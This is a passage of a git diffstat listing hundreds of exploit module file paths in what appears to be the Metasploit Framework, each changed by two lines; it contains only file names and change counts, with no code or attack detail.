modules/exploits/multi/http/jboss_bshdeployer.rb | 2 +- modules/exploits/multi/http/jboss_deploymentfilerepository.rb | 2 +- modules/exploits/multi/http/jboss_maindeployer.rb | 2 +- modules/exploits/multi/http/jboss_seam_upload_exec.rb | 2 +- modules/exploits/multi/http/jenkins_script_console.rb | 2 +- modules/exploits/multi/http/jira_hipchat_template.rb | 2 +- modules/exploits/multi/http/kordil_edms_upload_exec.rb | 2 +- modules/exploits/multi/http/lcms_php_exec.rb | 2 +- modules/exploits/multi/http/log1cms_ajax_create_folder.rb | 2 +- modules/exploits/multi/http/manage_engine_dc_pmp_sqli.rb | 2 +- modules/exploits/multi/http/manageengine_auth_upload.rb | 2 +- modules/exploits/multi/http/manageengine_sd_uploader.rb | 2 +- modules/exploits/multi/http/manageengine_search_sqli.rb | 2 +- modules/exploits/multi/http/mantisbt_php_exec.rb | 2 +- modules/exploits/multi/http/mediawiki_thumb.rb | 2 +- modules/exploits/multi/http/mma_backdoor_upload.rb | 2 +- modules/exploits/multi/http/mobilecartly_upload_exec.rb | 2 +- modules/exploits/multi/http/mutiny_subnetmask_exec.rb | 2 +- modules/exploits/multi/http/netwin_surgeftp_exec.rb | 2 +- modules/exploits/multi/http/nibbleblog_file_upload.rb | 2 +- modules/exploits/multi/http/op5_license.rb | 2 +- modules/exploits/multi/http/op5_welcome.rb | 2 +- modules/exploits/multi/http/openfire_auth_bypass.rb | 2 +- modules/exploits/multi/http/openmediavault_cmd_exec.rb | 2 +- modules/exploits/multi/http/openx_backdoor_php.rb | 2 +- modules/exploits/multi/http/opmanager_socialit_file_upload.rb | 2 +- modules/exploits/multi/http/oracle_reports_rce.rb | 2 +- modules/exploits/multi/http/pandora_upload_exec.rb | 2 +- modules/exploits/multi/http/php_cgi_arg_injection.rb | 2 +- modules/exploits/multi/http/php_volunteer_upload_exec.rb | 2 +- modules/exploits/multi/http/phpfilemanager_rce.rb | 2 +- modules/exploits/multi/http/phpldapadmin_query_engine.rb | 2 +- modules/exploits/multi/http/phpmyadmin_3522_backdoor.rb | 2 +- modules/exploits/multi/http/phpmyadmin_preg_replace.rb | 2 +- modules/exploits/multi/http/phpscheduleit_start_date.rb | 2 +- modules/exploits/multi/http/phptax_exec.rb | 2 +- modules/exploits/multi/http/phpwiki_ploticus_exec.rb | 2 +- modules/exploits/multi/http/plone_popen2.rb | 2 +- modules/exploits/multi/http/pmwiki_pagelist.rb | 2 +- modules/exploits/multi/http/polarcms_upload_exec.rb | 2 +- modules/exploits/multi/http/processmaker_exec.rb | 2 +- modules/exploits/multi/http/qdpm_upload_exec.rb | 2 +- modules/exploits/multi/http/rails_json_yaml_code_exec.rb | 2 +- modules/exploits/multi/http/rails_secret_deserialization.rb | 2 +- modules/exploits/multi/http/rails_xml_yaml_code_exec.rb | 2 +- .../multi/http/rocket_servergraph_file_requestor_rce.rb | 2 +- modules/exploits/multi/http/sflog_upload_exec.rb | 2 +- modules/exploits/multi/http/simple_backdoors_exec.rb | 2 +- modules/exploits/multi/http/sit_file_upload.rb | 2 +- modules/exploits/multi/http/snortreport_exec.rb | 2 +- .../exploits/multi/http/solarwinds_store_manager_auth_filter.rb | 2 +- modules/exploits/multi/http/sonicwall_gms_upload.rb | 2 +- modules/exploits/multi/http/splunk_mappy_exec.rb | 2 +- modules/exploits/multi/http/splunk_upload_app_exec.rb | 2 +- modules/exploits/multi/http/spree_search_exec.rb | 2 +- modules/exploits/multi/http/spree_searchlogic_exec.rb | 2 +- modules/exploits/multi/http/struts_code_exec.rb | 2 +- modules/exploits/multi/http/struts_code_exec_classloader.rb | 2 +- .../exploits/multi/http/struts_code_exec_exception_delegator.rb | 2 +- modules/exploits/multi/http/struts_code_exec_parameters.rb | 2 +- modules/exploits/multi/http/struts_default_action_mapper.rb | 2 +- modules/exploits/multi/http/struts_dev_mode.rb | 2 +- modules/exploits/multi/http/struts_include_params.rb | 2 +- modules/exploits/multi/http/stunshell_eval.rb | 2 +- modules/exploits/multi/http/stunshell_exec.rb | 2 +- modules/exploits/multi/http/sun_jsws_dav_options.rb | 2 +- modules/exploits/multi/http/sysaid_auth_file_upload.rb | 2 +- modules/exploits/multi/http/sysaid_rdslogs_file_upload.rb | 2 +- modules/exploits/multi/http/testlink_upload_exec.rb | 2 +- modules/exploits/multi/http/tomcat_mgr_deploy.rb | 2 +- modules/exploits/multi/http/tomcat_mgr_upload.rb | 2 +- modules/exploits/multi/http/traq_plugin_exec.rb | 2 +- modules/exploits/multi/http/uptime_file_upload_1.rb | 2 +- modules/exploits/multi/http/v0pcr3w_exec.rb | 2 +- modules/exploits/multi/http/vbseo_proc_deutf.rb | 2 +- modules/exploits/multi/http/vbulletin_unserialize.rb | 2 +- modules/exploits/multi/http/visual_mining_netcharts_upload.rb | 2 +- modules/exploits/multi/http/vtiger_install_rce.rb | 2 +- modules/exploits/multi/http/vtiger_php_exec.rb | 2 +- modules/exploits/multi/http/vtiger_soap_upload.rb | 2 +- modules/exploits/multi/http/webpagetest_upload_exec.rb | 2 +- modules/exploits/multi/http/wikka_spam_exec.rb | 2 +- modules/exploits/multi/http/x7chat2_php_exec.rb | 2 +- modules/exploits/multi/http/zemra_panel_rce.rb | 2 +- .../multi/http/zenworks_configuration_management_upload.rb | 2 +- modules/exploits/multi/http/zenworks_control_center_upload.rb | 2 +- .../exploits/multi/http/zpanel_information_disclosure_rce.rb | 2 +- modules/exploits/multi/ids/snort_dce_rpc.rb | 2 +- modules/exploits/multi/misc/arkeia_agent_exec.rb | 2 +- modules/exploits/multi/misc/batik_svg_java.rb | 2 +- modules/exploits/multi/misc/hp_data_protector_exec_integutil.rb | 2 +- modules/exploits/multi/misc/hp_vsa_exec.rb | 2 +- modules/exploits/multi/misc/indesign_server_soap.rb | 2 +- modules/exploits/multi/misc/java_jdwp_debugger.rb | 2 +- modules/exploits/multi/misc/java_jmx_server.rb | 2 +- modules/exploits/multi/misc/java_rmi_server.rb | 2 +- modules/exploits/multi/misc/legend_bot_exec.rb | 2 +- modules/exploits/multi/misc/openview_omniback_exec.rb | 2 +- modules/exploits/multi/misc/pbot_exec.rb | 2 +- modules/exploits/multi/misc/persistent_hpca_radexec_exec.rb | 2 +- modules/exploits/multi/misc/ra1nx_pubcall_exec.rb | 2 +- modules/exploits/multi/misc/veritas_netbackup_cmdexec.rb | 2 +- modules/exploits/multi/misc/w3tw0rk_exec.rb | 2 +- modules/exploits/multi/misc/wireshark_lwres_getaddrbyname.rb | 2 +- .../exploits/multi/misc/wireshark_lwres_getaddrbyname_loop.rb | 2 +- modules/exploits/multi/misc/zend_java_bridge.rb | 2 +- modules/exploits/multi/ntp/ntp_overflow.rb | 2 +- modules/exploits/multi/php/php_unserialize_zval_cookie.rb | 2 +- modules/exploits/multi/realserver/describe.rb | 2 +- modules/exploits/multi/samba/nttrans.rb | 2 +- modules/exploits/multi/samba/usermap_script.rb | 2 +- modules/exploits/multi/script/web_delivery.rb | 2 +- modules/exploits/multi/ssh/sshexec.rb | 2 +- modules/exploits/multi/svn/svnserve_date.rb | 2 +- modules/exploits/multi/upnp/libupnp_ssdp_overflow.rb | 2 +- modules/exploits/multi/vnc/vnc_keyboard_exec.rb | 2 +- modules/exploits/multi/vpn/tincd_bof.rb | 2 +- modules/exploits/multi/wyse/hagent_untrusted_hsdata.rb | 2 +- modules/exploits/netware/smb/lsass_cifs.rb | 2 +- modules/exploits/netware/sunrpc/pkernel_callit.rb | 2 +- modules/exploits/osx/afp/loginext.rb | 2 +- modules/exploits/osx/arkeia/type77.rb | 2 +- modules/exploits/osx/browser/mozilla_mchannel.rb | 2 +- modules/exploits/osx/browser/safari_file_policy.rb | 2 +- modules/exploits/osx/browser/safari_metadata_archive.rb | 2 +- .../osx/browser/safari_user_assisted_applescript_exec.rb | 2 +- .../osx/browser/safari_user_assisted_download_launch.rb | 2 +- modules/exploits/osx/browser/software_update.rb | 2 +- modules/exploits/osx/email/mailapp_image_exec.rb | 2 +- modules/exploits/osx/ftp/webstar_ftp_user.rb | 2 +- modules/exploits/osx/http/evocam_webserver.rb | 2 +- modules/exploits/osx/local/iokit_keyboard_root.rb | 2 +- modules/exploits/osx/local/nfs_mount_root.rb | 2 +- modules/exploits/osx/local/persistence.rb | 2 +- modules/exploits/osx/local/sudo_password_bypass.rb | 2 +- modules/exploits/osx/local/vmware_bash_function_root.rb | 2 +- modules/exploits/osx/mdns/upnp_location.rb | 2 +- modules/exploits/osx/misc/ufo_ai.rb | 2 +- modules/exploits/osx/rtsp/quicktime_rtsp_content_type.rb | 2 +- modules/exploits/osx/samba/lsa_transnames_heap.rb | 2 +- modules/exploits/osx/samba/trans2open.rb | 2 +- modules/exploits/solaris/dtspcd/heap_noir.rb | 2 +- modules/exploits/solaris/lpd/sendmail_exec.rb | 2 +- modules/exploits/solaris/samba/lsa_transnames_heap.rb | 2 +- modules/exploits/solaris/samba/trans2open.rb | 2 +- modules/exploits/solaris/sunrpc/sadmind_adm_build_path.rb | 2 +- modules/exploits/solaris/sunrpc/sadmind_exec.rb | 2 +- modules/exploits/solaris/sunrpc/ypupdated_exec.rb | 2 +- modules/exploits/solaris/telnet/fuser.rb | 2 +- modules/exploits/solaris/telnet/ttyprompt.rb | 2 +- modules/exploits/unix/dhcp/bash_environment.rb | 2 +- modules/exploits/unix/ftp/proftpd_133c_backdoor.rb | 2 +- modules/exploits/unix/ftp/proftpd_modcopy_exec.rb | 2 +- modules/exploits/unix/ftp/vsftpd_234_backdoor.rb | 2 +- modules/exploits/unix/http/contentkeeperweb_mimencode.rb | 2 +- modules/exploits/unix/http/ctek_skyrouter.rb | 2 +- modules/exploits/unix/http/freepbx_callmenum.rb | 2 +- modules/exploits/unix/http/lifesize_room.rb | 2 +- modules/exploits/unix/http/twiki_debug_plugins.rb | 2 +- modules/exploits/unix/http/vmturbo_vmtadmin_exec_noauth.rb | 2 +- modules/exploits/unix/irc/unreal_ircd_3281_backdoor.rb | 2 +- modules/exploits/unix/misc/distcc_exec.rb | 2 +- modules/exploits/unix/misc/qnx_qconn_exec.rb | 2 +- modules/exploits/unix/misc/spamassassin_exec.rb | 2 +- modules/exploits/unix/misc/xerox_mfp.rb | 2 +- modules/exploits/unix/misc/zabbix_agent_exec.rb | 2 +- modules/exploits/unix/smtp/clamav_milter_blackhole.rb | 2 +- modules/exploits/unix/smtp/exim4_string_format.rb | 2 +- modules/exploits/unix/ssh/array_vxag_vapv_privkey_privesc.rb | 2 +- modules/exploits/unix/ssh/tectia_passwd_changereq.rb | 2 +- modules/exploits/unix/webapp/actualanalyzer_ant_cookie_exec.rb | 2 +- modules/exploits/unix/webapp/arkeia_upload_exec.rb | 2 +- modules/exploits/unix/webapp/awstats_configdir_exec.rb | 2 +- modules/exploits/unix/webapp/awstats_migrate_exec.rb | 2 +- modules/exploits/unix/webapp/awstatstotals_multisort.rb | 2 +- modules/exploits/unix/webapp/barracuda_img_exec.rb | 2 +- modules/exploits/unix/webapp/base_qry_common.rb | 2 +- modules/exploits/unix/webapp/basilic_diff_exec.rb | 2 +- modules/exploits/unix/webapp/cacti_graphimage_exec.rb | 2 +- modules/exploits/unix/webapp/cakephp_cache_corruption.rb | 2 +- modules/exploits/unix/webapp/carberp_backdoor_exec.rb | 2 +- modules/exploits/unix/webapp/citrix_access_gateway_exec.rb | 2 +- modules/exploits/unix/webapp/clipbucket_upload_exec.rb | 2 +- modules/exploits/unix/webapp/coppermine_piceditor.rb | 2 +- modules/exploits/unix/webapp/datalife_preview_exec.rb | 2 +- modules/exploits/unix/webapp/dogfood_spell_exec.rb | 2 +- modules/exploits/unix/webapp/egallery_upload_exec.rb | 2 +- modules/exploits/unix/webapp/flashchat_upload_exec.rb | 2 +- modules/exploits/unix/webapp/foswiki_maketext.rb | 2 +- modules/exploits/unix/webapp/freepbx_config_exec.rb | 2 +- modules/exploits/unix/webapp/generic_exec.rb | 2 +- modules/exploits/unix/webapp/get_simple_cms_upload_exec.rb | 2 +- modules/exploits/unix/webapp/google_proxystylesheet_exec.rb | 2 +- modules/exploits/unix/webapp/graphite_pickle_exec.rb | 2 +- modules/exploits/unix/webapp/guestbook_ssi_exec.rb | 2 +- modules/exploits/unix/webapp/hastymail_exec.rb | 2 +- modules/exploits/unix/webapp/havalite_upload_exec.rb | 2 +- modules/exploits/unix/webapp/horde_unserialize_exec.rb | 2 +- modules/exploits/unix/webapp/hybridauth_install_php_exec.rb | 2 +- modules/exploits/unix/webapp/instantcms_exec.rb | 2 +- .../exploits/unix/webapp/invision_pboard_unserialize_exec.rb | 2 +- modules/exploits/unix/webapp/joomla_akeeba_unserialize.rb | 2 +- modules/exploits/unix/webapp/joomla_comjce_imgmanager.rb | 2 +- modules/exploits/unix/webapp/joomla_contenthistory_sqli_rce.rb | 2 +- modules/exploits/unix/webapp/joomla_media_upload_exec.rb | 2 +- modules/exploits/unix/webapp/joomla_tinybrowser.rb | 2 +- modules/exploits/unix/webapp/kimai_sqli.rb | 2 +- modules/exploits/unix/webapp/libretto_upload_exec.rb | 2 +- modules/exploits/unix/webapp/maarch_letterbox_file_upload.rb | 2 +- modules/exploits/unix/webapp/mambo_cache_lite.rb | 2 +- modules/exploits/unix/webapp/mitel_awc_exec.rb | 2 +- modules/exploits/unix/webapp/moinmoin_twikidraw.rb | 2 +- modules/exploits/unix/webapp/mybb_backdoor.rb | 2 +- modules/exploits/unix/webapp/nagios3_history_cgi.rb | 2 +- modules/exploits/unix/webapp/nagios3_statuswml_ping.rb | 2 +- modules/exploits/unix/webapp/nagios_graph_explorer.rb | 2 +- modules/exploits/unix/webapp/narcissus_backend_exec.rb | 2 +- modules/exploits/unix/webapp/open_flash_chart_upload_exec.rb | 2 +- modules/exploits/unix/webapp/openemr_sqli_privesc_upload.rb | 2 +- modules/exploits/unix/webapp/openemr_upload_exec.rb | 2 +- modules/exploits/unix/webapp/opensis_modname_exec.rb | 2 +- modules/exploits/unix/webapp/openview_connectednodes_exec.rb | 2 +- modules/exploits/unix/webapp/openx_banner_edit.rb | 2 +- modules/exploits/unix/webapp/oracle_vm_agent_utl.rb | 2 +- modules/exploits/unix/webapp/oscommerce_filemanager.rb | 2 +- modules/exploits/unix/webapp/pajax_remote_exec.rb | 2 +- modules/exploits/unix/webapp/php_charts_exec.rb | 2 +- modules/exploits/unix/webapp/php_eval.rb | 2 +- modules/exploits/unix/webapp/php_include.rb | 2 +- modules/exploits/unix/webapp/php_vbulletin_template.rb | 2 +- modules/exploits/unix/webapp/php_xmlrpc_eval.rb | 2 +- modules/exploits/unix/webapp/phpbb_highlight.rb | 2 +- modules/exploits/unix/webapp/phpmyadmin_config.rb | 2 +- modules/exploits/unix/webapp/projectpier_upload_exec.rb | 2 +- modules/exploits/unix/webapp/projectsend_upload_exec.rb | 2 +- modules/exploits/unix/webapp/qtss_parse_xml_exec.rb | 2 +- modules/exploits/unix/webapp/redmine_scm_exec.rb | 2 +- modules/exploits/unix/webapp/seportal_sqli_exec.rb | 2 +- modules/exploits/unix/webapp/simple_e_document_upload_exec.rb | 2 +- .../exploits/unix/webapp/sixapart_movabletype_storable_exec.rb | 2 +- modules/exploits/unix/webapp/skybluecanvas_exec.rb | 2 +- modules/exploits/unix/webapp/sphpblog_file_upload.rb | 2 +- modules/exploits/unix/webapp/spip_connect_exec.rb | 2 +- modules/exploits/unix/webapp/squash_yaml_exec.rb | 2 +- modules/exploits/unix/webapp/squirrelmail_pgp_plugin.rb | 2 +- modules/exploits/unix/webapp/sugarcrm_unserialize_exec.rb | 2 +- modules/exploits/unix/webapp/tikiwiki_graph_formula_exec.rb | 2 +- modules/exploits/unix/webapp/tikiwiki_jhot_exec.rb | 2 +- modules/exploits/unix/webapp/tikiwiki_unserialize_exec.rb | 2 +- modules/exploits/unix/webapp/trixbox_langchoice.rb | 2 +- modules/exploits/unix/webapp/tuleap_unserialize_exec.rb | 2 +- modules/exploits/unix/webapp/twiki_history.rb | 2 +- modules/exploits/unix/webapp/twiki_maketext.rb | 2 +- modules/exploits/unix/webapp/twiki_search.rb | 2 +- modules/exploits/unix/webapp/vbulletin_vote_sqli_exec.rb | 2 +- modules/exploits/unix/webapp/vicidial_manager_send_cmd_exec.rb | 2 +- modules/exploits/unix/webapp/webmin_show_cgi_exec.rb | 2 +- modules/exploits/unix/webapp/webtester_exec.rb | 2 +- modules/exploits/unix/webapp/wp_admin_shell_upload.rb | 2 +- modules/exploits/unix/webapp/wp_advanced_custom_fields_exec.rb | 2 +- modules/exploits/unix/webapp/wp_ajax_load_more_file_upload.rb | 2 +- modules/exploits/unix/webapp/wp_asset_manager_upload_exec.rb | 2 +- .../exploits/unix/webapp/wp_creativecontactform_file_upload.rb | 2 +- modules/exploits/unix/webapp/wp_downloadmanager_upload.rb | 2 +- .../unix/webapp/wp_easycart_unrestricted_file_upload.rb | 2 +- modules/exploits/unix/webapp/wp_foxypress_upload.rb | 2 +- modules/exploits/unix/webapp/wp_frontend_editor_file_upload.rb | 2 +- .../exploits/unix/webapp/wp_google_document_embedder_exec.rb | 2 +- modules/exploits/unix/webapp/wp_holding_pattern_file_upload.rb | 2 +- .../exploits/unix/webapp/wp_inboundio_marketing_file_upload.rb | 2 +- modules/exploits/unix/webapp/wp_infusionsoft_upload.rb | 2 +- modules/exploits/unix/webapp/wp_lastpost_exec.rb | 2 +- modules/exploits/unix/webapp/wp_nmediawebsite_file_upload.rb | 2 +- modules/exploits/unix/webapp/wp_optimizepress_upload.rb | 2 +- .../unix/webapp/wp_photo_gallery_unrestricted_file_upload.rb | 2 +- modules/exploits/unix/webapp/wp_pixabay_images_upload.rb | 2 +- modules/exploits/unix/webapp/wp_platform_exec.rb | 2 +- modules/exploits/unix/webapp/wp_property_upload_exec.rb | 2 +- modules/exploits/unix/webapp/wp_reflexgallery_file_upload.rb | 2 +- modules/exploits/unix/webapp/wp_revslider_upload_execute.rb | 2 +- modules/exploits/unix/webapp/wp_slideshowgallery_upload.rb | 2 +- modules/exploits/unix/webapp/wp_symposium_shell_upload.rb | 2 +- modules/exploits/unix/webapp/wp_total_cache_exec.rb | 2 +- modules/exploits/unix/webapp/wp_worktheflow_upload.rb | 2 +- modules/exploits/unix/webapp/wp_wpshop_ecommerce_file_upload.rb | 2 +- modules/exploits/unix/webapp/wp_wptouch_file_upload.rb | 2 +- modules/exploits/unix/webapp/wp_wysija_newsletters_upload.rb | 2 +- modules/exploits/unix/webapp/xoda_file_upload.rb | 2 +- modules/exploits/unix/webapp/zeroshell_exec.rb | 2 +- modules/exploits/unix/webapp/zimbra_lfi.rb | 2 +- modules/exploits/unix/webapp/zoneminder_packagecontrol_exec.rb | 2 +- modules/exploits/unix/webapp/zpanel_username_exec.rb | 2 +- modules/exploits/unix/x11/x11_keyboard_exec.rb | 2 +- modules/exploits/windows/antivirus/ams_hndlrsvc.rb | 2 +- modules/exploits/windows/antivirus/ams_xfr.rb | 2 +- .../exploits/windows/antivirus/symantec_endpoint_manager_rce.rb | 2 +- modules/exploits/windows/antivirus/symantec_iao.rb | 2 +- modules/exploits/windows/antivirus/symantec_rtvscan.rb | 2 +- .../windows/antivirus/symantec_workspace_streaming_exec.rb | 2 +- modules/exploits/windows/antivirus/trendmicro_serverprotect.rb | 2 +- .../windows/antivirus/trendmicro_serverprotect_createbinding.rb | 2 +- .../windows/antivirus/trendmicro_serverprotect_earthagent.rb | 2 +- modules/exploits/windows/arkeia/type77.rb | 2 +- modules/exploits/windows/backdoor/energizer_duo_payload.rb | 2 +- modules/exploits/windows/backupexec/name_service.rb | 2 +- modules/exploits/windows/backupexec/remote_agent.rb | 2 +- modules/exploits/windows/brightstor/ca_arcserve_342.rb | 2 +- modules/exploits/windows/brightstor/discovery_tcp.rb | 2 +- modules/exploits/windows/brightstor/discovery_udp.rb | 2 +- modules/exploits/windows/brightstor/etrust_itm_alert.rb | 2 +- modules/exploits/windows/brightstor/hsmserver.rb | 2 +- modules/exploits/windows/brightstor/lgserver.rb | 2 +- modules/exploits/windows/brightstor/lgserver_multi.rb | 2 +- modules/exploits/windows/brightstor/lgserver_rxrlogin.rb | 2 +- .../brightstor/lgserver_rxssetdatagrowthscheduleandfilter.rb | 2 +- .../exploits/windows/brightstor/lgserver_rxsuselicenseini.rb | 2 +- modules/exploits/windows/brightstor/license_gcr.rb | 2 +- modules/exploits/windows/brightstor/mediasrv_sunrpc.rb | 2 +- modules/exploits/windows/brightstor/message_engine.rb | 2 +- modules/exploits/windows/brightstor/message_engine_72.rb | 2 +- modules/exploits/windows/brightstor/message_engine_heap.rb | 2 +- modules/exploits/windows/brightstor/sql_agent.rb | 2 +- modules/exploits/windows/brightstor/tape_engine.rb | 2 +- modules/exploits/windows/brightstor/tape_engine_0x8a.rb | 2 +- modules/exploits/windows/brightstor/universal_agent.rb | 2 +- modules/exploits/windows/browser/adobe_cooltype_sing.rb | 2 +- modules/exploits/windows/browser/adobe_flash_avm2.rb | 2 +- .../exploits/windows/browser/adobe_flash_casi32_int_overflow.rb | 2 +- .../windows/browser/adobe_flash_copy_pixels_to_byte_array.rb | 2 +- .../exploits/windows/browser/adobe_flash_domain_memory_uaf.rb | 2 +- .../windows/browser/adobe_flash_filters_type_confusion.rb | 2 +- modules/exploits/windows/browser/adobe_flash_mp4_cprt.rb | 2 +- modules/exploits/windows/browser/adobe_flash_otf_font.rb | 2 +- modules/exploits/windows/browser/adobe_flash_pcre.rb | 2 +- modules/exploits/windows/browser/adobe_flash_regex_value.rb | 2 +- modules/exploits/windows/browser/adobe_flash_rtmp.rb | 2 +- modules/exploits/windows/browser/adobe_flash_sps.rb | 2 +- .../browser/adobe_flash_uncompress_zlib_uninitialized.rb | 2 +- .../windows/browser/adobe_flash_worker_byte_array_uaf.rb | 2 +- .../exploits/windows/browser/adobe_flashplayer_arrayindexing.rb | 2 +- modules/exploits/windows/browser/adobe_flashplayer_avm.rb | 2 +- modules/exploits/windows/browser/adobe_flashplayer_flash10o.rb | 2 +- .../exploits/windows/browser/adobe_flashplayer_newfunction.rb | 2 +- .../exploits/windows/browser/adobe_flatedecode_predictor02.rb | 2 +- modules/exploits/windows/browser/adobe_geticon.rb | 2 +- modules/exploits/windows/browser/adobe_jbig2decode.rb | 2 +- modules/exploits/windows/browser/adobe_media_newplayer.rb | 2 +- .../exploits/windows/browser/adobe_shockwave_rcsl_corruption.rb | 2 +- modules/exploits/windows/browser/adobe_toolbutton.rb | 2 +- modules/exploits/windows/browser/adobe_utilprintf.rb | 2 +- .../windows/browser/advantech_webaccess_dvs_getcolor.rb | 2 +- modules/exploits/windows/browser/aim_goaway.rb | 2 +- modules/exploits/windows/browser/aladdin_choosefilepath_bof.rb | 2 +- modules/exploits/windows/browser/amaya_bdo.rb | 2 +- modules/exploits/windows/browser/aol_ampx_convertfile.rb | 2 +- modules/exploits/windows/browser/aol_icq_downloadagent.rb | 2 +- modules/exploits/windows/browser/apple_itunes_playlist.rb | 2 +- .../exploits/windows/browser/apple_quicktime_marshaled_punk.rb | 2 +- modules/exploits/windows/browser/apple_quicktime_mime_type.rb | 2 +- modules/exploits/windows/browser/apple_quicktime_rtsp.rb | 2 +- modules/exploits/windows/browser/apple_quicktime_smil_debug.rb | 2 +- .../windows/browser/apple_quicktime_texml_font_table.rb | 2 +- modules/exploits/windows/browser/ask_shortformat.rb | 2 +- modules/exploits/windows/browser/asus_net4switch_ipswcom.rb | 2 +- .../exploits/windows/browser/athocgov_completeinstallation.rb | 2 +- modules/exploits/windows/browser/autodesk_idrop.rb | 2 +- modules/exploits/windows/browser/aventail_epi_activex.rb | 2 +- modules/exploits/windows/browser/awingsoft_web3d_bof.rb | 2 +- modules/exploits/windows/browser/awingsoft_winds3d_sceneurl.rb | 2 +- .../windows/browser/baofeng_storm_onbeforevideodownload.rb | 2 +- modules/exploits/windows/browser/barcode_ax49.rb | 2 +- .../exploits/windows/browser/blackice_downloadimagefileurl.rb | 2 +- .../exploits/windows/browser/c6_messenger_downloaderactivex.rb | 2 +- modules/exploits/windows/browser/ca_brightstor_addcolumn.rb | 2 +- modules/exploits/windows/browser/chilkat_crypt_writefile.rb | 2 +- modules/exploits/windows/browser/cisco_anyconnect_exec.rb | 2 +- modules/exploits/windows/browser/cisco_playerpt_setsource.rb | 2 +- .../exploits/windows/browser/cisco_playerpt_setsource_surl.rb | 2 +- modules/exploits/windows/browser/citrix_gateway_actx.rb | 2 +- modules/exploits/windows/browser/clear_quest_cqole.rb | 2 +- modules/exploits/windows/browser/communicrypt_mail_activex.rb | 2 +- .../exploits/windows/browser/creative_software_cachefolder.rb | 2 +- .../exploits/windows/browser/crystal_reports_printcontrol.rb | 2 +- modules/exploits/windows/browser/dell_webcam_crazytalk.rb | 2 +- modules/exploits/windows/browser/dxstudio_player_exec.rb | 2 +- modules/exploits/windows/browser/ea_checkrequirements.rb | 2 +- .../exploits/windows/browser/ebook_flipviewer_fviewerloading.rb | 2 +- modules/exploits/windows/browser/enjoysapgui_comp_download.rb | 2 +- .../exploits/windows/browser/enjoysapgui_preparetoposthtml.rb | 2 +- modules/exploits/windows/browser/facebook_extractiptc.rb | 2 +- modules/exploits/windows/browser/foxit_reader_plugin_url_bof.rb | 2 +- modules/exploits/windows/browser/getgodm_http_response_bof.rb | 2 +- modules/exploits/windows/browser/gom_openurl.rb | 2 +- modules/exploits/windows/browser/greendam_url.rb | 2 +- .../exploits/windows/browser/honeywell_hscremotedeploy_exec.rb | 2 +- modules/exploits/windows/browser/honeywell_tema_exec.rb | 2 +- .../windows/browser/hp_alm_xgo_setshapenodetype_exec.rb | 2 +- .../windows/browser/hp_easy_printer_care_xmlcachemgr.rb | 2 +- .../windows/browser/hp_easy_printer_care_xmlsimpleaccessor.rb | 2 +- modules/exploits/windows/browser/hp_loadrunner_addfile.rb | 2 +- modules/exploits/windows/browser/hp_loadrunner_addfolder.rb | 2 +- .../exploits/windows/browser/hp_loadrunner_writefilebinary.rb | 2 +- .../exploits/windows/browser/hp_loadrunner_writefilestring.rb | 2 +- modules/exploits/windows/browser/hpmqc_progcolor.rb | 2 +- modules/exploits/windows/browser/hyleos_chemviewx_activex.rb | 2 +- modules/exploits/windows/browser/ibm_spss_c1sizer.rb | 2 +- modules/exploits/windows/browser/ibm_tivoli_pme_activex_bof.rb | 2 +- modules/exploits/windows/browser/ibmegath_getxmlvalue.rb | 2 +- .../exploits/windows/browser/ibmlotusdomino_dwa_uploadmodule.rb | 2 +- modules/exploits/windows/browser/ie_cbutton_uaf.rb | 2 +- modules/exploits/windows/browser/ie_cgenericelement_uaf.rb | 2 +- modules/exploits/windows/browser/ie_createobject.rb | 2 +- modules/exploits/windows/browser/ie_execcommand_uaf.rb | 2 +- modules/exploits/windows/browser/ie_iscomponentinstalled.rb | 2 +- modules/exploits/windows/browser/ie_setmousecapture_uaf.rb | 2 +- modules/exploits/windows/browser/ie_unsafe_scripting.rb | 2 +- .../exploits/windows/browser/imgeviewer_tifmergemultifiles.rb | 2 +- .../windows/browser/indusoft_issymbol_internationalseparator.rb | 2 +- modules/exploits/windows/browser/inotes_dwa85w_bof.rb | 2 +- modules/exploits/windows/browser/intrust_annotatex_add.rb | 2 +- modules/exploits/windows/browser/java_basicservice_impl.rb | 2 +- modules/exploits/windows/browser/java_cmm.rb | 2 +- modules/exploits/windows/browser/java_codebase_trust.rb | 2 +- modules/exploits/windows/browser/java_docbase_bof.rb | 2 +- modules/exploits/windows/browser/java_mixer_sequencer.rb | 2 +- modules/exploits/windows/browser/java_ws_arginject_altjvm.rb | 2 +- modules/exploits/windows/browser/java_ws_double_quote.rb | 2 +- modules/exploits/windows/browser/java_ws_vmargs.rb | 2 +- modules/exploits/windows/browser/juniper_sslvpn_ive_setupdll.rb | 2 +- modules/exploits/windows/browser/kazaa_altnet_heap.rb | 2 +- modules/exploits/windows/browser/keyhelp_launchtripane_exec.rb | 2 +- modules/exploits/windows/browser/logitechvideocall_start.rb | 2 +- modules/exploits/windows/browser/lpviewer_url.rb | 2 +- .../exploits/windows/browser/macrovision_downloadandexecute.rb | 2 +- modules/exploits/windows/browser/macrovision_unsafe.rb | 2 +- modules/exploits/windows/browser/malwarebytes_update_exec.rb | 2 +- modules/exploits/windows/browser/maxthon_history_xcs.rb | 2 +- modules/exploits/windows/browser/mcafee_mcsubmgr_vsprintf.rb | 2 +- modules/exploits/windows/browser/mcafee_mvt_exec.rb | 2 +- .../exploits/windows/browser/mcafeevisualtrace_tracetarget.rb | 2 +- modules/exploits/windows/browser/mirc_irc_url.rb | 2 +- modules/exploits/windows/browser/mozilla_attribchildremoved.rb | 2 +- .../windows/browser/mozilla_firefox_onreadystatechange.rb | 2 +- .../exploits/windows/browser/mozilla_firefox_xmlserializer.rb | 2 +- modules/exploits/windows/browser/mozilla_interleaved_write.rb | 2 +- modules/exploits/windows/browser/mozilla_mchannel.rb | 2 +- modules/exploits/windows/browser/mozilla_nssvgvalue.rb | 2 +- modules/exploits/windows/browser/mozilla_nstreerange.rb | 2 +- modules/exploits/windows/browser/mozilla_reduceright.rb | 2 +- modules/exploits/windows/browser/ms03_020_ie_objecttype.rb | 2 +- modules/exploits/windows/browser/ms05_054_onload.rb | 2 +- modules/exploits/windows/browser/ms06_001_wmf_setabortproc.rb | 2 +- modules/exploits/windows/browser/ms06_013_createtextrange.rb | 2 +- modules/exploits/windows/browser/ms06_055_vml_method.rb | 2 +- modules/exploits/windows/browser/ms06_057_webview_setslice.rb | 2 +- modules/exploits/windows/browser/ms06_067_keyframe.rb | 2 +- modules/exploits/windows/browser/ms06_071_xml_core.rb | 2 +- .../windows/browser/ms07_017_ani_loadimage_chunksize.rb | 2 +- modules/exploits/windows/browser/ms08_041_snapshotviewer.rb | 2 +- modules/exploits/windows/browser/ms08_053_mediaencoder.rb | 2 +- 